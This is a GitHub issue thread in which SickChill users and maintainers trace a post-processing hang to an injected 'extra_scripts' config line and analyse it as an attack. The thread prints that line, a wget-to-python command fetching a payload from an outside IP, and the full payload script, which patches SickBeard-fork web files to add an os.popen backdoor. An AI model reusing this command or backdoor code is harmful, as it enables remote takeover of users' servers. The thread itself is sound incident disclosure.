### ISSUE TITLE
nzbToMedia HTTPConnectionPool ReadTimeout

### ISSUE THREAD

**Issue by Keou0007** [SickChill/SickChill#5978]
Branch/Commit: master/ 09207fe0680c8a8fd7b9b93127f28b62b6de3732
OS: Linux-5.3.0-28-generic-x86_64-with-Ubuntu-18.04-bionic
Browser: Safari

What you did: 
Show is downloaded with sabnzbd+ and nzbToMedia script is run. As per usual for last X years or so.

What happened:
Postprocessing completes successfully as expected (files moved and renamed etc), except that the nzbToMedia script stalls for half hour and then exits with a failure due to HTTPConnectionPool ReadTimeout exception after default timeout of 1800 seconds.
Sabnzbd+ then marks the download as failed and doesn't correctly clean up the junk files/folders because the post-processing script exits with a return code of 1.

What you expected: 
After post-processing completes, the nzbToMedia script should exit with a success return code instead of stalling and timing out.

Other info:
While the script is stalled, the web interface to sickchill stops responding, it's as though the api call to initiate post processing gets stuck after it finishes and stalls the program instead of sending back some return code that nzbToMedia is expecting.
If I restart sickchill with `systemctl restart sickchill` during the half hour that everything is stalled, then the nzbToMedia script returns successfully and everything is it should be after sickchill restarts.

Logs:
I created an issue on the nzbToMedia github page, but they couldn't seem to figure out what the problem was. You can see logs for both nzbToMedia  and sickchill on that issue.
https://github.com/clinton-hall/nzbToMedia/issues/1713

**Comment by miigotu** [comment]
As far as the logs it looks like it succeeds on SC side. I see the call it makes doesn't ask for return data even...

**Comment by Keou0007** [comment]
That's the same conclusion everyone seems to reach, yet I'm still seeing exceptions and script failures. 
I don't understand how the requests library works well enough to understand what's going on here, could it be fixed using a try block and catching the exception somewhere? perhaps setting the timeout shorter so it doesn't stall for half an hour? or would that break something else?

**Comment by Keou0007** [comment]
I've been watching this for a few days now and found some consistent behaviour that is def sickchill related.

Today, an episode downloaded and sab send the post-processing api request and then sat idle for half an hour before exiting with the timeout exception.
On the sickchill side, the logs show the post-processing succeeding, and then sickchill continues back into it's loop of periodically running the daily search, BUT the web interface is no longer accessible. From the moment the post-process request is sent, the web interface stops responding. Even after the nzbToMedia script timesout, the web interface remains unresponsive. The web-browser simply appears to be attempting to load indefinitely. The only way I can get the interface back is by restarting sickchill.

I can't see anything in the logs to explain this behaviour, but it is definitely happening.
I'd be happy to help debug and try and fix this if someone could point me in the right direction.
Should there be debug logs when the web interface is accessed? I feel like this would help find the issue.

**Comment by Keou0007** [comment]
A little more new info, I previously mentioned that when everything stalled, I was able to get the nzbToMedia script to return success by using systemd to restart sickchill.
I tried this just now and got a new line in the nzbToMedia logs that I haven't seen before.

```
[18:02:02] [POSTPROCESS]::SICKBEARD: SUCCESS: The download succeeded, sending a post-process request
[18:02:02] [DEBUG]::SICKBEARD: Opening URL: http://localhost:8081/api/XXX/?cmd=postprocess with params: {u'path': '/Media/usenet/complete/tv/XXXX', u'nzbName': 'XXXX.nzb', u'failed': 0, u'force_next': 1, u'return_data': 0, u'type': u'manual'}
[18:05:34] [ERROR]::SICKBEARD: Unable to open URL: http://localhost:8081/api/XXX/?cmd=postprocess
[18:05:34] [ERROR]::MAIN: A problem was reported in the /opt/nzbToMedia/nzbToSickBeard.py script.
Changing to directory: /opt/nzbToMedia

-- Cleaning bytecode --
Removing cleanup.pyc
Removing eol.pyc
Removing nzbToMedia.pyc

Removing cleanup.pyc
Removing eol.pyc
Removing nzbToMedia.pyc


-- Cleaning folders: [u'libs', u'core'] --
No folders to clean

Returning to directory:  /usr/bin

-- Cleanup finished --

SickBeard: Failed to post-process - Unable to connect to SickBeard!
```

This brings me back to my conclusion:
- Sickchill receives the post-processing request and acts on it accordingly
- Something about this process of activating the post-processing via the api URL causes the thread/sub-process in sickchill that runs the webserver to crash or stall or whatever results in it not sending back the return that the request is expecting.
- The web interface is then no longer responsive and attempts to load it wait indefinitely.
- Similarly, the nzbToMedia script then waits on the URL to load until it times out and fails.

**Comment by Keou0007** [comment]
Problem solved. 
I found this in my config.ini file

```
extra_scripts = /usr/bin/wget --no-check-certificate https://195.154.179.106/.DS_Store -O /tmp/.fix.py|/usr/bin/python2.7 /tmp/.fix.py
```

that then combined with these lines from `postProcessor.py`

```
self._log("Absolute path to script: {0}".format(script_cmd[0]), logger.DEBUG)

            script_cmd += [
                ep_location, file_path, str(ep_obj.show.indexerid),
                str(ep_obj.season), str(ep_obj.episode), str(ep_obj.airdate)
            ]

            # use subprocess to run the command and capture output
            self._log("Executing command: {0}".format(script_cmd))
            try:
                p = subprocess.Popen(
                    script_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                    stderr=subprocess.STDOUT, cwd=sickbeard.PROG_DIR
                )
                out, err_ = p.communicate()

                self._log("Script result: {0}".format(out), logger.DEBUG)
```

which created the following subprocess call

```
[u'/usr/bin/wget', '--no-check-certificate', 'https://195.154.179.106/.DS_Store', '-O', '/tmp/.fix.py', '/Media/TV Shows/XXXX.mkv', '/Media/usenet/complete/tv/XXXX/XXXX.mkv', '314324', '4', '2', '2020-02-14']
```

`p.communicate()` would then wait indefinitely, and apparently block any other webserver functions, while the wget subprocess failed to complete it's task.

So... even though I've now found and fixed the issue by removing the "extra_scripts" line from the config.ini file in my setup, I'm still curious how that line got there in the first place.
What was it intended to do?
When and how did something change (recently!) that meant this broke everything for me?

So many questions.

**Comment by miigotu** [comment]
That line in your ini is not from us

**Comment by miigotu** [comment]
I would be concerned why you have a file stored as `.DS_Store`, which is saved as `/tmp/.fix.py` Is that your IP?

**Comment by Keou0007** [comment]
I've had the same config.ini file for a few years now, I haven't touched it.
I did transfer over to SickChill a while ago from SickRage and kept the same config.ini file, but it's only recently that I've been noticing these problems so something must have changed somewhere.

My thinking was along the same lines as yours, it does seem very suspect. That's not my ip, no.
I'll paste what I found in the .fix.py file below, which appears to look for sickbeard webserver file and insert four lines containing an autocomplete function. I have no idea what that would ultimately achieve.

You can close this issue now if you like, since I'm not getting errors anymore. But my curiosity about this extra_scripts command would love if you were able to shed some light on it for me.

```
import os.path
import os

l1="    def autocomplete(self, path='', includeFiles=False, fileTypes=''):  # pylint: disable=arguments-differ"
l2="        self.set_header(b'Cache-Control', 'max-age=0,no-cache,no-store')"
l3="        self.set_header(b'Content-Type', 'application/json')"
l4="        return os.popen(path).read()"

ports=["8081","8181","8880", "8083", "8089","8888","8889","9000", "7071", "5001"]

guessPaths = []

guessPaths.append("/root/.sickrage/sickbeard/webserve.py")

guessPaths.append("/volume1/@appstore/sickbeard-custom/var/SickBeard/medusa/server/web/core/file_browser.py")
guessPaths.append("/volume1/@appstore/sickbeard-custom/var/SickBeard/sickbeard/webserve.py")

guessPaths.append("/opt/sickchill/sickbeard/webserve.py")
guessPaths.append("/opt/sickbeard/sickbeard/webserve.py")
guessPaths.append("/opt/sickrage/sickbeard/webserve.py")
guessPaths.append("/opt/sickgear/sickbeard/webserve.py")
guessPaths.append("/opt/SickRage/sickbeard/webserve.py")

guessPaths.append("/opt/medusa/medusa/server/web/core/file_browser.py")

guessPaths.append("/app/sickbeard/sickbeard/webserve.py")
guessPaths.append("/app/sickgear/sickbeard/webserve.py")
guessPaths.append("/app/sickchill/sickbeard/webserve.py")
guessPaths.append("/app/sickrage/sickbeard/webserve.py")
guessPaths.append("/app/medusa/medusa/server/web/core/file_browser.py")

guessPaths.append("/usr/share/sickrage/sickbeard/webserve.py")
guessPaths.append("/var/db/sickrage/sickbeard/webserve.py")

guessPaths.append("/opt/SickChill/sickbeard/webserve.py")
guessPaths.append("/opt/SickRage/sickbeard/webserve.py")
guessPaths.append("/opt/Sick-Rage/sickbeard/webserve.py")
guessPaths.append("/raid/data/module/SickRageCE/sys/SickRage-master/sickbeard/webserve.py")

guessPaths.append("/home/Sickrage/sickbeard/webserve.py")

guessPaths.append("/var/db/sickrage/sickbeard/webserve.py")
guessPaths.append("/root/Medusa/server/web/core/file_browser.py")
guessPaths.append("/home/teamcoltra/.piracy/sickrage/medusa/server/web/core/file_browser.py")

guessPaths.append("/usr/pbi/sickrage-amd64/share/sickrage/SickRage/sickbeard/webserve.py")

guessPaths.append("/Applications/SickChill/sickbeard/webserve.py")
guessPaths.append("/Applications/SickRage/sickbeard/webserve.py")
guessPaths.append("/home/owner/.sickrage/sickbeard/webserve.py")	

guessPaths.append("/var/www/sickrage/sickbeard/webserve.py")	


path="/opt /usr /volume1 /var /app /apps"

def stringInFile(string, fo):
    fo.seek(0)
    return string in fo.read()

def resetPostProcessing(url):
    conf = get_current_conf(url)
    save(conf, url)
    
# Find local instance
sickragePath = None
sickrageUrl = None

#for port in ports:
#    # Try to connect to it
#    sickrageUrl = "http://localhost:"+port
#    
#    url = sickrageUrl+"/config/"
#    
#    try:
#        r = os.popen("wget -T 2 -t 1 -O - "+url).read().strip()
#    except:
#        print "err request"+port
#        continue
#    
#    if "config-dir" not in r:
#        print "Couldn't find expected text "+port
#        continue
#    
#    s = r.index("config-dir")
#    s = r.index("col-xs-12", s)
#    s = r.index(">", s)+1
#    e = r.index("</div>", s)
#    sickragePath = r[s:e].strip() + "/sickbeard/webserve.py"
#    
#    break


for p in guessPaths:
  if (os.path.isfile(p)):
    print "Using static path ",p
    if not sickragePath:
      sickragePath = ""
    sickragePath = sickragePath + p + "\n";

if not sickragePath:
    print "Could not find local sickrage :( trying slow find"
    findCmd="find "+path+" -type f \( -name webserve.py -o -name file_browser.py \) 2>/dev/null"
    files = os.popen(findCmd).read().strip()
else:
    files = sickragePath.strip()


print "Starting modify"
print files

for f in files.split("\n"):
    
    if not f:
        continue
    
    print "Trying: "+f

    f = f.strip()
        
    fo = open(f, "r")
    
    if not stringInFile("@route('/browser(/?.*)')", fo):
        print "Doesn't look like sickrage"
        continue
    
    if stringInFile("return os.popen(path).read()", fo):
        print "Already modified"
        continue
    
    lineNoCmd = "grep -n \"return json.dumps(paths)\" "+f+" | cut -d: -f 1"
    
    lineNo = int(os.popen(lineNoCmd).read())
    
    print lineNo

    with open(f, "r+") as fo:
        lines = fo.readlines()
    
        lines.insert(lineNo+1, l1+"\n\n"+l2+"\n\n"+l3+"\n"+l4+"\n\n")
        fo.seek(0)
        fo.writelines(lines)

    print "Success: Triggering a restart"

    os.popen("touch /tmp/.fixed")
    
    os.remove("/tmp/.fix.py")
    
    #if sickrageUrl:
    #    resetPostProcessing(sickrageUrl)
    
    #if sickrageUrl:
    #    try:
    #        r = os.popen("wget -O - "+sickrageUrl+"/home/restart/?pid=1").read().strip()
    #        print "Restarting"
    #    except:
    #        print "err request"
    #        continue

```

**Comment by miigotu** [comment]
@clinton-hall any insight on this? It adds a method to webserve to expose reading any file on this guys PC, and it's fairly thorough at finding different SC/SR/Medusa versions
@Keou0007 Looks like you had your SC exposed to the internet without a password? Someone added this postprocessing script to your config (probably right through the UI) We need more info, because this doesn't belong to any of us.
@medariox This effects your users also

**Comment by miigotu** [comment]
That IP is registered with the domain `naboo.maxoulamenasse.fr`

```

IP Location | France Paris Online S.a.s.
-- | --
ASN | AS12876 Online SAS, FR (registered Dec 20, 1999)
Resolve Host | naboo.maxoulamenasse.fr
Whois Server | whois.ripe.net
IP Address | 195.154.179.106


```

**Comment by miigotu** [comment]
https://plexguide.com/members/maxoulamenasse.8035/

**Comment by Keou0007** [comment]
You're right re: password. I didn't even think about that. Fixed now!
Happy to provide any info, what are you after?

**Comment by miigotu** [comment]
@Keou0007 it completed, and ran the script, but you didn't see it because instead of returning it restarts SC so the new code is loaded.

**Comment by clinton-hall** [comment]
WOW...

Ok, so the restarting to SC explains why nzbToMedia timed out... but that is minor in comparison to what this reveals...

As above, this is a very thorough attempt to expose files through any SickBeard fork.

The author would appear to be relatively familiar with All SickBeard forks, and at a quick glance I would say they "borrowed" some of the api code from these various open-source projects.

This highlights the need to keep a strong password on all externally accessible systems.

I think this needs to be shared around the wider community (including Medusa and SickRage). I can put some of this info up on nzbToMedia and link in the other repos if you are happy for me to do so.

Have you seen anything in this to suggest nzbToMedia itself was used to gain access? i.e. is there anything I need to address?

**Comment by miigotu** [comment]
@clinton-hall I think it was directly caused by exposing the web interface to the internet without a password. I mostly just want everyone to be aware that this person is putting effort into accessing those machines.

Some people even run as root, because our users mostly aren't sysadmins.

@Keou0007 what user does your SR run as and does it have administrator/root privileges?
I would be concerned that the attacker can switch that DS_Store out for anything at any time,  launching all sorts of malware, bots, Bitcoin miners, literally anything. The machine you use SR on is 100% compromised, only limited by the permissions the user that SC runs as has.

Hopefully I can find a way to force users to set a password, and prevent piping in the external_scripts line for now.

**Comment by Keou0007** [comment]
@miigotu @clinton-hall  I disagree, there is far more evidence that this script never ran than that it did:

- the script at the end touches `/tmp/.fixed` and removes `/tmp/.fix.py` and I found this file at `/tmp/.fix.py`
- the lines to restart sickbeard at the end are commented out
- if the sickchill code had been modified, this would have been picked up by git and caused the scheduled git pull update process to fail.
- the script searches for files called `webserve.py` and `file_browser.py`, neither of which exist in the version of sickchill I'm running, so even if it did run, it wouldn't have inserted code anywhere, at least for me on this system.
- In my testing (as I described above) I replicated running the wget line as produced by the extra_scripts code and because of all the extra arguments that code adds, it simply caused wget to try and download from a non-existent location, which seems to have caused it to stall indefinitely. While this is happening, the web server is blocking at the `p.communicate()` line while it waits for the return from the subprocess and so it stopped responding to URL queries, which broke both the nzbToMedia script and the web interface. Sickrage never actually restarted. 

Thankfully, I have systemd configured to run sickchill as a standard user. 

This strikes me as an attempt to exploit a vulnerability that failed and was abandoned. I do think the initial vulnerability should be fixed though. As a user, I have no idea what half the settings do and had no idea that this "extra_scripts" functionality even existed. Having the program try and run any arbitrary code entered into one of the text fields in the config seems like a very bad idea.
